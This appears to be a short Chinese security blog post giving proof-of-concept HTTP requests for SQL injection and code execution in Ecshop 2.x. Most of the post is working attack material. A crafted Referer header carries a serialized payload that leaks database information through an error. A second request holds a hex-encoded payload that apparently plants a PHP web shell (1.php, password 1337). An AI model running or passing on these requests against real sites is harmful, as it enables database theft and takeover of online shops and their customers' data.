Ecshop 2.x Sql injection & Code execution

漏洞 0 8195
指尖安全-小胖
指尖安全-小胖 2018年09月04日

Sql injection

thum/20180904/5b8e4bce0a931.jpg

Request

GET /ecshop//user.php?act=login HTTP/1.1
Host: 10.13.1.30
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=d771e6eaef7507e6acc3e43205dde277f8041f12; ECS[visit_times]=1
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 08:55:56 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-control: private
Content-Length: 768
Connection: close
Content-Type: text/html; charset=utf-8

MySQL server error report:Array
(
    [0] => Array
        (
            [message] => MySQL Query Error
        )

    [1] => Array
        (
            [sql] => SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop`.`ecs_ad` AS a LEFT JOIN `ecshop`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1536022557' AND end_time >= '1536022557' AND a.position_id = '1' ORDER BY rnd LIMIT 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -
        )

    [2] => Array
        (
            [error] => XPATH syntax error: '~5.5.53'
        )

    [3] => Array
        (
            [errno] => 1105
        )

)

Code execution

thum/20180904/5b8e4c9e28774.jpg

http://10.13.1.30/ecshop/1.php 1337

thum/20180904/5b8e4cd193ed9.jpg

GET /ecshop//user.php?act=login HTTP/1.1
Host: 10.13.1.30
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=d771e6eaef7507e6acc3e43205dde277f8041f12; ECS[visit_times]=1
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
Connection: close
Upgrade-Insecure-Requests: 1

参考文献

http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/